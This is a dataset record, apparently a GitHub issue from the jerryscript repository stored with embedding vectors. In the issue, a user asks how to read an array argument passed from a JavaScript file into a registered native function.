-0.012457452714443207, 0.006002048030495644, 0.010315506719052792, -0.006527679041028023, 0.010374640114605427, 0.01069001853466034, -0.01402120478451252, 0.01880444586277008, 0.0022421444300562143, 0.0005346651887521148, -0.010335218161344528, -0.012628283351659775, -0.0026248693466186523, 0.009921283461153507, 0.004760244861245155, 0.03684672713279724, -0.01204351894557476, -0.0002897129743359983, -0.0024408986791968346, 0.0007449175463989377, 0.019606033340096474, -0.010946263559162617, -0.032983340322971344, 0.02030249498784542, -0.027569342404603958, -0.0017789321718737483, 0.025190861895680428, 0.020381338894367218, 0.021340616047382355, 0.008626917377114296, 0.003712268313392997, 0.0000466343444713857, -0.0034461678005754948, 0.0164522472769022, 0.0075625148601830006, 0.00023735521244816482, -0.009435075335204601, -0.007621648255735636, 0.01921181008219719, -0.007279988378286362, -0.02349570207297802, 0.04328570514917374, 0.007983019575476646, 0.026859739795327187, 0.029671866446733475, 0.006353563629090786, 0.006879194639623165, 0.004195191897451878, -0.017674339935183525, -0.017858311533927917, 0.028436632826924324, 0.006491541862487793, 0.0007486134418286383, -0.002657721284776926, -0.013469292782247066, -0.006192589178681374, -0.0028285514563322067, -0.0014241313328966498, -0.00795016810297966, -0.004122917540371418, -0.012556008994579315, -0.014638821594417095, 0.0004628016031347215, 0.014954200014472008, -0.01167557667940855, -0.0008541502756997943, 0.01477022934705019, 0.021813683211803436, -0.014901637099683285, 0.004412014503031969, -0.010492906905710697, 0.03235258162021637, -0.00048251275438815355, -0.018081704154610634, 0.0067937797866761684, 0.00473724864423275, -0.0025131728034466505, -0.005591399036347866, 0.02138003706932068, 0.011130235157907009, -0.019527189433574677, 0.007582226302474737, -0.0030174499843269587, -0.02059159055352211, 0.0014315230073407292, 0.020394479855895042, -0.008528362028300762, 0.006120315287262201, 0.006688653491437435, 0.020631013438105583, 0.01921181008219719, 0.013022505678236485, -0.008876591920852661, -0.010368069633841515, 0.0014627323253080249, -0.0007124762632884085, 0.011544168926775455, -0.0054797022603452206, 0.00020891775784548372, 0.000616795034147799, -0.008778036572039127, -0.0034560232888907194, -0.018462786450982094, -0.006117030046880245, -0.0037516907323151827, -0.03224745765328407, -0.03482304885983467, 0.0045204260386526585, 0.023916207253932953, -0.016977878287434578, 0.019264373928308487, -0.009067133069038391, 0.005979051813483238, -0.010584892705082893, 0.01789773255586624, 0.013048787601292133, 0.008193272165954113, 0.005890351720154285, -0.0053285835310816765, -0.010538900271058083, 0.010072402656078339, 0.010177528485655785, -0.006373275071382523, 0.002501674694940448, -0.009750453755259514, -0.009658467955887318, -0.013929219916462898, -0.010361499153077602, 0.0003782078856602311, 0.005634106695652008, 0.02490176446735859, 0.01973744109272957, 0.008955436758697033, -0.02420530468225479, -0.014651961624622345, 0.005269450135529041, -0.018962135538458824, -0.015256437472999096, -0.005308872554451227, 0.017937155440449715, 0.01880444586277008, 0.013561277650296688, -0.0015317213255912066, -0.02959302067756653, 0.0036334237083792686, 0.005821362603455782, -0.005210316739976406, -0.0012598716421052814, 0.011478465050458908, 0.003007594496011734, 0.0027480642311275005, -0.003600571770220995, -0.00570638058707118, -0.00257723405957222, 0.0065178233198821545, 0.005745803005993366, 0.005092049483209848, -0.006990891415625811, -0.019251232966780663, 0.011570450849831104, 0.011563880369067192, -0.012529727071523666, -0.006202444899827242, 0.017490368336439133, -0.0014290590770542622, 0.009993557818233967, -0.024599527940154076, 0.02156400866806507, 0.018383940681815147, 0.008968577720224857, -0.01553239393979311, 0.002460609655827284, -0.014270879328250885, 0.015676941722631454, -0.0057950811460614204, 0.012464023195207119, 0.01701730117201805, -0.007529662922024727, -0.00624843779951334, 0.0027447789907455444, 0.009395652450621128, -0.0054665617644786835, 0.04517797753214836, -0.02499375119805336, 0.004310173448175192, -0.006028329487890005, -0.0018429934279993176, -0.016347121447324753, -0.001346107921563089, -0.0015169379767030478, -0.023745376616716385, 0.00883059948682785, 0.005302302073687315, 0.004454722162336111, 0.017109286040067673, -0.0028991829603910446, -0.013968641869723797, 0.0046156966127455235, 0.013219617307186127, 0.00007797200669301674, 0.0182788148522377, -0.01390293799340725, 0.009007999673485756, 0.008843740448355675, 0.009724171832203865, 0.0014939416432753205, 0.003998080268502235, 0.004569703713059425, -0.011728139594197273, 0.01026951428502798, 0.00940222293138504, 0.008764895610511303, 0.004832519218325615, -0.004822663497179747, -0.01349557377398014, 0.00841666478663683, -0.000694818387273699, 0.015703223645687103, -0.016885893419384956, 0.0013025791849941015, 0.012818824499845505, 0.006163022480905056, 0.01148503553122282, -0.016386544331908226, 0.005187320057302713, 0.053115006536245346, 0.013410159386694431, -0.01542726717889309, -0.0016606651479378343, 0.0031110779382288456, -0.014901637099683285, -0.008088145405054092, -0.02325916849076748, 0.009553342126309872, 0.003295048838481307, -0.009940994903445244, 0.014270879328250885, 0.012023807503283024, -0.011806984432041645, 0.027175119146704674, -0.019750582054257393, 0.0020203939639031887, -0.012266911566257477, -0.01162958424538374, 0.024599527940154076 ]
25
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
I want to use a function in XXX.js file , like this "test_function([0x121212, 0x121212])", and I have successfully register the test_function , but don't known how acquire this array value. I didn't find some related function of jerryscript to acquire this parameters from js file?
How to get the array from js file?
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4770/comments
13
2021-09-16T04:19:06
2021-10-28T12:33:06Z
https://github.com/jerryscript-project/jerryscript/issues/4770
997,753,829
4,770
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : How to get the array from js file? Issue date: --- start body --- I want to use a function in XXX.js file , like this "test_function([0x121212, 0x121212])", and I have successfully register the test_function , but don't known how acquire this array value. I didn't find some related function of jerryscript to acquire this parameters from js file? --- end body ---
446
[ -0.0061192926950752735, -0.005688609555363655, -0.007601561490446329, -0.011104452423751354, 0.004615489859133959, 0.005699376575648785, 0.009051528759300709, 0.05323246493935585, -0.05377799645066261, 0.010666591115295887, -0.03152602165937424, 0.006345401518046856, 0.02994685061275959, 0.031784433871507645, 0.028051843866705894, 0.011305438354611397, -0.025295469909906387, 0.012446749024093151, -0.008455749601125717, 0.01821790635585785, 0.011319794692099094, -0.011312616057693958, -0.01678229495882988, 0.03623482584953308, -0.005792691372334957, -0.013767511583864689, 0.01640903577208519, -0.01414794847369194, -0.06936873495578766, -0.024204405024647713, 0.010975247249007225, 0.024434102699160576, -0.032789360731840134, -0.031411174684762955, 0.002758168149739504, -0.003998177126049995, -0.0019614037591964006, 0.007479534484446049, -0.04596827179193497, -0.02141931839287281, 0.014004386961460114, -0.014801151119172573, -0.01577736809849739, -0.0011323383077979088, -0.0048380098305642605, 0.06563614308834076, 0.0516820028424263, 0.027247900143265724, 0.01715555414557457, -0.0028801949229091406, 0.014600166119635105, -0.0042099300771951675, 0.013997209258377552, -0.028267184272408485, 0.01747138798236847, -0.004802119452506304, 0.016078844666481018, -0.017327826470136642, -0.0012193722650408745, -0.005602472927421331, 0.023515312001109123, -0.03703876957297325, 0.025640016421675682, -0.00028510342235676944, -0.022524740546941757, 0.04235053062438965, -0.030923064798116684, 0.06184612959623337, 0.012619022279977798, 0.041862424463033676, 0.03818725794553757, 0.016222406178712845, 0.011176233179867268, 0.04608311876654625, -0.04077135771512985, -0.009575527161359787, 0.015145698562264442, 0.024376679211854935, 0.012877432629466057, 0.03026268444955349, -0.014959068968892097, 0.0160357765853405, 0.004762640222907066, 0.0006132751586847007, -0.03830210864543915, 0.007063207216560841, -0.04519304260611534, -0.0585155114531517, -0.03563186898827553, 0.011204945854842663, -0.030434956774115562, 0.04849494621157646, -0.018304042518138885, 0.021979207172989845, 0.017040705308318138, 0.03181314468383789, 0.0021605947986245155, 0.0018321988172829151, -0.03244481235742569, 0.020098557695746422, 0.024376679211854935, 0.047403883188962936, -0.027850857004523277, -0.033277466893196106, 0.0009753183694556355, 0.003678753739222884, 0.03574671968817711, -0.010501495562493801, 0.004296066705137491, 0.038704078644514084, -0.0012516735587269068, -0.016868431121110916, -0.019265903159976006, 0.0026684424374252558, 0.00042529983329586685, 0.02546774223446846, 0.019352039322257042, -0.05524231866002083, -0.0033934260718524456, 0.001460734405554831, -0.005842937622219324, 0.015676874667406082, -0.013035349547863007, -0.036952633410692215, -0.03138246014714241, 0.0507345013320446, 0.015849146991968155, 0.008226051926612854, 0.024146979674696922, -0.02605634368956089, -0.06316689401865005, -0.03075079247355461, -0.011858148500323296, -0.009065885096788406, 0.030521094799041748, 0.0026774147991091013, -0.005907540209591389, 0.04525046423077583, -0.03158344700932503, -0.04720289632678032, -0.04166143760085106, -0.04203469678759575, 0.023371750488877296, 0.00333600165322423, -0.0041560945101082325, -0.010688125155866146, 0.002268265699967742, 0.036263540387153625, -0.03660808503627777, -0.004436038434505463, 0.034655652940273285, -0.004798530600965023, 0.008965391665697098, -0.01084604300558567, 0.037211041897535324, 0.018993135541677475, -0.012023244053125381, 0.03181314468383789, 0.03500020131468773, 0.009396075271070004, -0.01923719048500061, -0.010243086144328117, -0.024477170780301094, 0.028941921889781952, -0.017026348039507866, -0.006776085123419762, 0.007260603830218315, -0.009970319457352161, -0.007658985909074545, 0.0066971261985599995, -0.019050560891628265, -0.008060957305133343, 0.02632910944521427, 0.06305204331874847, -0.025697439908981323, -0.01709812879562378, 0.002883784007281065, 0.00045692813000641763, 0.024793006479740143, -0.04246538132429123, 0.021663373336195946, 0.007296494208276272, 0.006585866212844849, 0.03847438097000122, -0.01762930490076542, -0.004141738172620535, 0.00823323056101799, -0.06730145215988159, 0.045422740280628204, -0.02067280188202858, 0.0033700973726809025, 0.005588116589933634, 0.029430029913783073, 0.006097758654505014, 0.028468171134591103, 0.01281283050775528, -0.025797933340072632, -0.05685020238161087, -0.027104340493679047, 0.016667446121573448, 0.03853180631995201, -0.0043642581440508366, -0.010860398411750793, -0.02008420042693615, -0.03784271329641342, -0.003334206994622946, 0.006693537347018719, -0.024146979674696922, 0.010975247249007225, -0.023687584325671196, 0.0149447126314044, 0.008620845153927803, 0.007282137870788574, -0.036148689687252045, -0.033909138292074203, -0.005950608290731907, 0.041747573763132095, -0.005225624889135361, 0.0022000742610543966, -0.01762930490076542, -0.0007308158092200756, -0.006097758654505014, 0.022151481360197067, 0.004712393973022699, -0.019481243565678596, -0.01768673025071621, -0.021605947986245155, 0.006898111663758755, -0.022194549441337585, -0.017543168738484383, 0.0009833936346694827, -0.02269701287150383, -0.01556202583014965, -0.017859002575278282, 0.029602302238345146, -0.05521360784769058, -0.0017038910882547498, -0.015863504260778427, 0.005756800994277, 0.009553992189466953, -0.021333182230591774, 0.009288404136896133, -0.025080127641558647, -0.013200445100665092, 0.03744073957204819, 0.009618595242500305, -0.04496334493160248, -0.025051414966583252, -0.013143020682036877, 0.013121486641466618, 0.02780778892338276, -0.007515424862504005, -0.0018519384320825338, -0.03990999236702919, -0.011836614459753036, -0.018289687111973763, -0.0272335447371006, 0.029803289100527763, 0.030492382124066353, -0.03126761317253113, -0.009022816084325314, 0.014557098038494587, -0.04608311876654625, -0.018461959436535835, 0.034655652940273285, 0.008340900763869286, -0.022251972928643227, -0.018232261762022972, 0.008161449804902077, -0.02595585025846958, 0.007099097594618797, -0.022926710546016693, -0.011097274720668793, 0.03132503479719162, -0.032157689332962036, 0.019969351589679718, -0.029602302238345146, 0.006424359977245331, -0.017729798331856728, -0.00015354310744442046, -0.02823847159743309, 0.01902184821665287, 0.027219189330935478, 0.03281807154417038, -0.012669268995523453, -0.00927404873073101, 0.02792263776063919, -0.029602302238345146, 0.009747800417244434, -0.0026881820522248745, -0.017600594088435173, -0.047719717025756836, 0.02153416909277439, 0.007113453466445208, 0.01582043617963791, 0.025596948340535164, -0.0004241782589815557, -0.011757656000554562, 0.021448031067848206, 0.05860165134072304, -0.012080668471753597, -0.03416754677891731, -0.01089628878980875, 0.018505029380321503, -0.04028325155377388, -0.009582704864442348, 0.04272378981113434, 0.016480816528201103, 0.0016859458992257714, -0.01839018054306507, 0.0597788505256176, -0.03161215782165527, -0.03554573282599449, -0.031784433871507645, -0.03692391887307167, 0.021491099148988724, 0.032789360731840134, 0.00993443001061678, 0.003574671922251582, -0.020184693858027458, -0.0225821640342474, -0.03491406515240669, -0.02871222421526909, -0.008039422333240509, 0.040627796202898026, 0.02483607456088066, -0.025611303746700287, 0.01177919004112482, 0.011563848704099655, -0.0008667502552270889, 0.005505568813532591, -0.012791295535862446, -0.029544878751039505, 0.023673228919506073, -0.046915773302316666, -0.02515190839767456, -0.06138673424720764, -0.007702053990215063, 0.013946962542831898, -0.0012220640201121569, 0.0035692884121090174, 0.011980175971984863, 0.0012651323340833187, -0.006474606692790985, 0.014442249201238155, -0.041804999113082886, -0.020170336589217186, 0.02764987200498581, 0.014930356293916702, 0.013946962542831898, 0.0008147093467414379, 0.012209873646497726, -0.00017059098172467202, -0.0004840701585635543, 0.0033449740149080753, -0.03436853364109993, -0.02733403816819191, -0.027133051306009293, 0.02350095473229885, 0.013573704287409782, -0.015303615480661392, 0.0034203436225652695, -0.026142479851841927, 0.019409462809562683, 0.014485317282378674, -0.003267809981480241, 0.009051528759300709, -0.032100267708301544, -0.024548951536417007, -0.0007348535000346601, 0.013135842978954315, 0.03425368294119835, -0.003454439574852586, 0.012898966670036316, -0.006528441794216633, -0.028468171134591103, 0.0026971546467393637, -0.0030004275031387806, -0.02497963421046734, 0.019969351589679718, -0.0010031333658844233, -0.019567381590604782, -0.015059561468660831, -0.045106902718544006, 0.014987780712544918, -0.013200445100665092, -0.004306833725422621, 0.014557098038494587, 0.03187057003378868, 0.00189859583042562, -0.04378614202141762, 0.02914290688931942, -0.020486172288656235, -0.02786521427333355, -0.017069417983293533, 0.005426610354334116, -0.0061731282621622086, -0.010264620184898376, 0.013552170246839523, -0.004977982025593519, -0.01491600088775158, -0.015418464317917824, 0.008340900763869286, -0.009604238905012608, -0.02472122572362423, 0.0034490558318793774, -0.009632951579988003, -0.028941921889781952, 0.021189620718359947, 0.032530948519706726, 0.020974280312657356, -0.015461532399058342, -0.010731194168329239, -0.012640556320548058, 0.06219067797064781, 0.004166861530393362, 0.018103057518601418, 0.010960891842842102, -0.0165095292031765, 0.013387074694037437, -0.005053351633250713, -0.01246828306466341, -0.005638362839818001, -0.007852793671190739, -0.014133592136204243, -0.025769220665097237, -0.005189734511077404, -0.016121914610266685, 0.0069052898325026035, -0.022309398278594017, -0.04527917876839638, -0.008556243032217026, 0.007450822275131941, 0.034023985266685486, 0.034827928990125656, 0.010293331928551197, -0.003135015955194831, -0.015518956817686558, -0.0311240516602993, -0.01481550745666027, 0.024749936535954475, 0.015533313155174255, -0.012303188443183899, -0.03428239747881889, 0.02882707305252552, 0.0012866664910688996, -0.06494705379009247, -0.007788190618157387, 0.01425561960786581, 0.014262797310948372, 0.0039694649167358875, 0.0037864246405661106, -0.022022275254130363, 0.013501923531293869, -0.001327940379269421, -0.01033640094101429, -0.028109267354011536, 0.0023023614194244146, 0.0023974706418812275, -0.0033844534773379564, -0.0024351554457098246, -0.007960463874042034, -0.0013064062222838402, 0.01503084972500801, -0.006603811401873827, 0.009912895038723946, 0.019165409728884697, -0.033535879105329514, -0.005577349569648504, -0.035947706550359726, 0.0021390607580542564, -0.01007081288844347, 0.04507819190621376, 0.017413964495062828, -0.017342183738946915, -0.0029717152938246727, -0.0044468059204518795, -0.02338610589504242, -0.01345885545015335, -0.03255966305732727, -0.020486172288656235, -0.025266757234930992, -0.04082878306508064, 0.04596827179193497, 0.015461532399058342, -0.05857293680310249, 0.0026289629749953747, 0.011944285593926907, 0.019797079265117645, 0.04662865027785301, 0.030980490148067474, -0.00640641525387764, -0.03405269607901573, -0.022984135895967484, -0.027104340493679047, 0.008197340182960033, -0.030865641310811043, 0.025611303746700287, 0.00905870646238327, 0.020342610776424408, 0.037699151784181595, -0.06075506657361984, 0.02887014113366604, 0.0015136725269258022, 0.0022234029602259398, 0.010781439952552319, -0.026731081306934357, 0.03574671968817711, -0.027951350435614586, -0.014083346351981163, 0.008312189020216465, -0.047403883188962936, 0.02340046316385269, -0.021290114149451256, -0.0042099300771951675, -0.04002483934164047, -0.02259652130305767, -0.01646646112203598, 0.04183370992541313, 0.018476316705346107, -0.007895861752331257, 0.009927251376211643, -0.012525707483291626, 0.024333609268069267, 0.02849688194692135, 0.005738855805248022, -0.0023669640067964792, -0.008599311113357544, -0.04157530143857002, -0.020342610776424408, -0.04120204225182533, 0.018418891355395317, 0.0010399208404123783, 0.04743259400129318, -0.0032444812823086977, 0.013322471641004086, -0.013128664344549179, 0.036206115037202835, 0.0008815550245344639, 0.023113340139389038, 0.0014732959680259228, 0.04642766714096069, -0.015533313155174255, 0.014470960944890976, 0.00892232358455658, 0.007709232158958912, -0.017557526007294655, -0.004529353231191635, 0.004353491123765707, 0.05079192295670509, 0.0026487025897949934, -0.01784464716911316, 0.009733444079756737, 0.01124083623290062, -0.013257869519293308, -0.023041559383273125, 0.012209873646497726, 0.007953286170959473, -0.017729798331856728, -0.02242424711585045, 0.006467428524047136, -0.0038653830997645855, 0.01592092774808407, -0.013336827978491783, 0.005419432185590267, -0.017083773389458656, -0.027362748980522156, 0.05285920575261116, -0.042120832949876785, 0.010286154225468636, 0.014901644550263882, 0.0009555786964483559, -0.000411392335081473, 0.026300396770238876, 0.009798046201467514, 0.0026128124445676804, 0.002483607502654195, 0.028697868809103966, -0.007063207216560841, -0.015289259143173695, 0.023371750488877296, -0.015131342224776745, -0.0005796280456706882, 0.04114461690187454, -0.025008346885442734, -0.015461532399058342, -0.0007249836344271898, -0.023515312001109123, -0.01774415373802185, -0.024965278804302216, -0.03792884945869446, -0.009510924108326435, 0.0000691448658471927, 0.014844220131635666, 0.01784464716911316, -0.024419747292995453, -0.012719515711069107, -0.020285187289118767, 0.04034067317843437, 0.0014418920036405325, -0.0027294557075947523, 0.009482212364673615, 0.0034275217913091183, -0.03201413154602051, -0.011305438354611397, -0.01688278838992119, 0.009948785416781902, 0.02888449840247631, -0.023142052814364433, 0.03821596875786781, -0.019308971241116524, 0.017772866412997246, 0.020098557695746422, -0.008003532886505127, -0.008721337653696537, 0.016480816528201103, -0.018361467868089676, 0.014715014956891537, -0.008182983845472336, 0.024261830374598503, -0.0006558948662132025, -0.029717152938246727, -0.007845615036785603, -0.03405269607901573, 0.019323326647281647, 0.024276185780763626, -0.02653009444475174, -0.029803289100527763, -0.006065457593649626, -0.023845503106713295, -0.005225624889135361, -0.0046513802371919155, -0.015203122980892658, 0.007601561490446329, -0.0008362435037270188, 0.018304042518138885, 0.01890699937939644, 0.01955302432179451, -0.027161763980984688, 0.004030478652566671, -0.015303615480661392, 0.012690803036093712, -0.001988321542739868, 0.02749195508658886, -0.003632096340879798, -0.005735266953706741, -0.026616232469677925, -0.00732520641759038, -0.012059134431183338, 0.0025177032221108675, 0.011649984866380692, 0.006679181009531021, -0.000978010124526918, -0.006427949294447899, 0.013092773966491222, 0.0020331842824816704, 0.011104452423751354, 0.03818725794553757, -0.023515312001109123, -0.010027743875980377, -0.042494092136621475, -0.00039569035288877785, -0.011047028005123138, 0.0026594698429107666, 0.038818925619125366, -0.016911499202251434, -0.010616345331072807, 0.02876964956521988, -0.008470105938613415, -0.0006446791812777519, 0.011879682540893555, 0.008154272101819515, 0.003425727365538478, 0.008269120939075947, 0.011176233179867268, 0.004037656355649233, -0.00419557373970747, -0.0013620360987260938, 0.018562452867627144, -0.018074344843626022, -0.005663486197590828, 0.01007081288844347, -0.016653090715408325, -0.02281186170876026, -0.02371629700064659, -0.013186088763177395, -0.03347845375537872, -0.0041058482602238655, -0.006783262826502323, -0.00013582227984443307, -0.016796650364995003, 0.026788504794239998, 0.019840147346258163, 0.04427424818277359, -0.006847865413874388, -0.011858148500323296, 0.04278121516108513, -0.00011866223940160125, -0.03884764015674591, -0.037641726434230804, -0.01711248606443405, -0.012446749024093151, 0.0022880053147673607, -0.020687157288193703, 0.012547241523861885, 0.02391728200018406, 0.009094596840441227, -0.0038653830997645855, -0.012016065418720245, 0.011169055476784706, 0.013846470043063164, 0.015116985887289047, -0.03181314468383789, 0.02743452973663807, -0.008003532886505127, -0.01928025856614113, -0.010063634254038334, -0.014191016554832458, -0.027951350435614586, 0.003499302314594388, -0.011685875244438648, -0.012123736552894115, -0.039622869342565536, -0.04309704899787903, 0.023271257057785988, -0.027348393574357033, -0.011391574516892433, -0.00044975007767789066, -0.0012785912258550525, 0.008872076869010925, -0.02057230845093727, -0.010645057074725628, -0.007386219687759876, 0.0031996185425668955, -0.032042842358350754, -0.003224741667509079, -0.03006169945001602, 0.009367363527417183, -0.02243860252201557, 0.013150198385119438, 0.0016590282320976257, 0.0016545419348403811, -0.015633806586265564, 0.0016724870074540377, -0.012245764024555683, -0.035890281200408936, -0.031181475147604942, -0.005031817127019167, -0.013846470043063164, -0.0063059222884476185, 0.01748574525117874, 0.0035872336011379957, 0.024362321943044662, -0.004227874800562859, 0.023644516244530678, 0.0130784185603261, 0.025912782177329063, -0.012059134431183338, 0.021649017930030823, 0.021620305255055428, 0.0149447126314044, 0.052514657378196716, -0.020744582638144493, 0.04427424818277359, 0.013322471641004086, -0.025295469909906387, 0.0035262200981378555, -0.010429715737700462, 0.010702481493353844, 0.007824080996215343, -0.010623523034155369, 0.01481550745666027, -0.04160401225090027, 0.006707893218845129, -0.013071239925920963, 0.010322044603526592, -0.00929558277130127, 0.0009717293432913721, -0.002447717124596238, 0.005746033973991871, -0.011448999866843224, -0.0006783262942917645, 0.01742831990122795, 0.02275443822145462, -0.0003203207452315837, -0.008132737129926682, 0.025281112641096115, 0.008082491345703602, 0.0035674937535077333, 0.012697980739176273, 0.006381291896104813, -0.013293759897351265, 0.004730339162051678, 0.009396075271070004, 0.02951616607606411, -0.01966787315905094, 0.0008205415215343237, 0.027032559737563133, -0.006370524875819683, -0.00927404873073101, 0.03818725794553757, 0.007838437333703041, -0.005275871139019728, 0.016452103853225708, 0.04034067317843437, 0.011039850302040577, -0.031727008521556854, 0.0014706042129546404, -0.013128664344549179, 0.028008773922920227, -0.028410745784640312, -0.01839018054306507, 0.0049097901210188866, 0.029329536482691765, 0.00017103961727116257, 0.014887288212776184, 0.016983279958367348, -0.007544137071818113, 0.02467815764248371, 0.03336360305547714, 0.045307889580726624, -0.006869399454444647, 0.03419625759124756, 0.02195049449801445, -0.008541886694729328, 0.02440539002418518, 0.04792070388793945, 0.0012346256989985704, 0.043499018996953964, 0.012181160971522331, 0.0028801949229091406, 0.010451249778270721, -0.03310519456863403, 0.038072410970926285, -0.04502076655626297, 0.008584954775869846, -0.011370040476322174, 0.020155981183052063, -0.006101347506046295, 0.05768285691738129, 0.011901216581463814, -0.012461105361580849, -0.032416101545095444, 0.00111259869299829, -0.006715071387588978, -0.016595665365457535, 0.002054718555882573, 0.008060957305133343, 0.006417182274162769, 0.006392058916389942, 0.00862802378833294, 0.010293331928551197, -0.013631128706037998, -0.0025105250533670187, 0.0017613155068829656, 0.020557953044772148, 0.00003465655026957393, -0.00392998568713665, -0.038388244807720184, -0.020758938044309616, 0.03379428759217262, -0.00034364944440312684, -0.03505762666463852, -0.02253909595310688, -0.0031224542763084173, -0.05024639144539833, -0.01615062542259693, -0.06356886774301529, -0.0011206739582121372, -0.005598883610218763, -0.012934857048094273, -0.007709232158958912, 0.015963995829224586, -0.01640903577208519, 0.008190161548554897, 0.009597061201930046, -0.03910604864358902, 0.000556299346499145, -0.006241319701075554, -0.011391574516892433, 0.013293759897351265, -0.028482526540756226, -0.03431110829114914, -0.002040362451225519, 0.021175265312194824, -0.010401003062725067, -0.01518876664340496, -0.01566251739859581, 0.017614949494600296, 0.0020511294715106487, 0.005132310092449188, -0.0001141759566962719, -0.010092346929013729, -0.03405269607901573, 0.02238117903470993, -0.009302760474383831, -0.008089669048786163, -0.011355685070157051, 0.016222406178712845, 0.019538668915629387, -0.005749622825533152, -0.026458313688635826, 0.018950067460536957, -0.048035550862550735, 0.034827928990125656, 0.0055414591915905476, -0.01816048100590706, 0.018476316705346107, -0.010551742278039455, 0.0275493785738945, 0.04464750736951828, 0.02446281537413597, -0.011104452423751354, -0.0033324125688523054, -0.0011736121959984303, 0.0006680078222416341, -0.030836928635835648, -0.014478138647973537, 0.014973425306379795, 0.04404455050826073, -0.034023985266685486, 0.0022341699805110693, -0.012934857048094273, -0.020715869963169098, -0.010767084546387196, -0.023859858512878418, -0.020816363394260406, -0.02733403816819191, -0.006887344643473625, 0.02173515409231186, -0.0007824081112630665, 0.013580881990492344, 0.05555815249681473, 0.02073022536933422, 0.0009169966797344387, -0.0017828496638685465, 0.005950608290731907, -0.01454274170100689, -0.023242546245455742, -0.04427424818277359, 0.029745863750576973, 0.010422537103295326, 0.02141931839287281, -0.022984135895967484, 0.0034418778959661722, 0.03448338061571121, -0.03494277596473694, 0.009819580242037773, 0.0019165410194545984, 0.00953963678330183, -0.01859116554260254, 0.011169055476784706, -0.021189620718359947, -0.028626088052988052, -0.014234085567295551, 0.037699151784181595, -0.0049097901210188866, -0.0010937562910839915, -0.015231834724545479, 0.0042063407599925995, -0.004608312156051397, 0.004712393973022699, 0.00945349968969822, -0.0004261970752850175, 0.0033126729540526867, 0.012697980739176273, 0.0013575498014688492, 0.029401317238807678, -0.022022275254130363, -0.03187057003378868, -0.004479106981307268, 0.013559347949922085, 0.003965876065194607, 0.011319794692099094, 0.0025033471174538136, 0.030865641310811043, 0.02126140147447586, -0.012116558849811554, 0.0015334122581407428, 0.0038151368498802185, -0.03488535061478615, 0.010960891842842102, -0.0032947277650237083, 0.015547669492661953, -0.005117953754961491, -0.014341755770146847, 0.029860712587833405, 0.02945874258875847, -0.009195090271532536, 0.03781399875879288, -0.0038510269951075315, -0.005742444656789303, 0.008620845153927803, -0.03916347399353981, -0.02951616607606411, 0.016480816528201103, -0.017069417983293533, -0.002542826347053051, -0.03069336712360382, -0.023644516244530678, -0.03729717805981636, 0.03879021480679512, 0.028683511540293694, 0.023299969732761383, 0.009654485620558262, 0.024204405024647713, 0.022409891709685326, 0.0014562481082975864, -0.013178911060094833, 0.03896248713135719, -0.04134560376405716, -0.004152505658566952, 0.022122768685221672, -0.01153513602912426, 0.00025616688071750104, 0.04812168702483177, 0.010092346929013729, 0.0128415422514081, 0.04559501260519028, 0.017543168738484383, -0.03276064619421959, -0.029487453401088715, -0.003030934138223529, -0.007364685647189617, -0.012008887715637684, 0.004644202068448067, -0.013781867921352386, 0.012288832105696201, 0.05360572412610054, 0.0031475776340812445, -0.006162361241877079, -0.0007550417794845998, 0.014033099636435509, 0.00510359788313508, 0.00186808907892555, -0.028855785727500916, -0.002481812844052911, -0.07338844239711761, -0.010680947452783585, 0.014054633677005768, 0.052457232028245926, 0.0034418778959661722, 0.012784117832779884, 0.005462500732392073, -0.009302760474383831, 0.014485317282378674, 0.010530208237469196, 0.004432449582964182, 0.004346312955021858, 0.0030865641310811043, 0.00360338413156569, -0.009790868498384953, 0.05627596005797386, -0.009640129283070564, 0.032416101545095444, 0.000029301048925844952, -0.008613667450845242, -0.042178258299827576, -0.01217398326843977, 0.008240408264100552, -0.007501068525016308, -0.024548951536417007, 0.004113025963306427, 0.010925001464784145, 0.006779673974961042, -0.00876440666615963, 0.016868431121110916, 0.024046488106250763, -0.008872076869010925, 0.015116985887289047, 0.0007160110981203616, 0.021993564441800117, -0.019423820078372955, -0.009503746405243874, 0.00902999471873045, -0.025769220665097237, 0.003729000221937895, 0.017327826470136642, 0.03281807154417038, -0.0016796650597825646, -0.009525280445814133, -0.029544878751039505, -0.0009654485620558262, 0.0015585353830829263, 0.006546386983245611, -0.01597835309803486, 0.023299969732761383, -0.03164087235927582, 0.0021677729673683643, -0.007066796068102121, -0.019696585834026337, -0.019998064264655113, -0.027362748980522156, 0.03399527445435524, -0.007658985909074545, -0.0013135842746123672, 0.014320221729576588, 0.07201025635004044, 0.009604238905012608, 0.01113316509872675, 0.025295469909906387, -0.00927404873073101, -0.012037600390613079, 0.010408181697130203, 0.0012400092091411352, 0.010616345331072807, -0.006079813465476036, 0.0002615504199638963, 0.030291397124528885, -0.018131770193576813, -0.021778222173452377, 0.021778222173452377, -0.0005154741229489446, -0.029185976833105087, -0.007924573495984077, 0.02497963421046734, -0.006736605428159237, 0.004751873202621937, 0.02301284857094288, -0.016595665365457535, -0.005545048508793116, 0.02963101491332054, 0.009532458148896694, -0.02088814228773117, -0.01874908246099949, -0.0367516465485096, 0.026013275608420372, -0.0202421173453331, -0.007314438931643963, 0.008448571898043156, -0.018993135541677475, -0.014636056497693062, 0.010731194168329239, 0.04097234457731247, 0.017973853275179863, 0.0053871311247348785, -0.019036205485463142, 0.015906572341918945, -0.023256901651620865, -0.029975561425089836, 0.014930356293916702, -0.025596948340535164, -0.023457886651158333, 0.029774576425552368, 0.009044351056218147, -0.04039809852838516, 0.0021175264846533537, 0.005107186734676361, -0.026415245607495308, 0.01592092774808407, 0.00745800044387579, -0.003513658419251442, -0.018246619030833244, -0.03138246014714241, -0.02930082567036152, 0.014987780712544918, -0.014341755770146847, 0.007501068525016308, 0.02403213083744049, -0.007156522013247013, -0.010156949050724506, -0.006244908552616835, -0.009862649254500866, -0.03847438097000122, 0.023314325138926506, -0.031353749334812164, 0.005423021502792835, -0.009094596840441227, 0.02344353124499321, 0.01593528501689434, -0.00010486691462574527, -0.009496567770838737, 0.009553992189466953, -0.009927251376211643, 0.029401317238807678, -0.008154272101819515, -0.016208050772547722, 0.01321480143815279, 0.0010282564908266068, 0.02169208601117134, 0.01009952463209629, -0.001157461549155414, 0.022840574383735657, -0.017945140600204468, 0.009252514690160751, 0.004191984888166189, -0.030291397124528885, -0.03660808503627777, -0.010688125155866146, 0.0016276242677122355, 0.011420287191867828, 0.021649017930030823, -0.005053351633250713, 0.02595585025846958, -0.0007792676915414631, 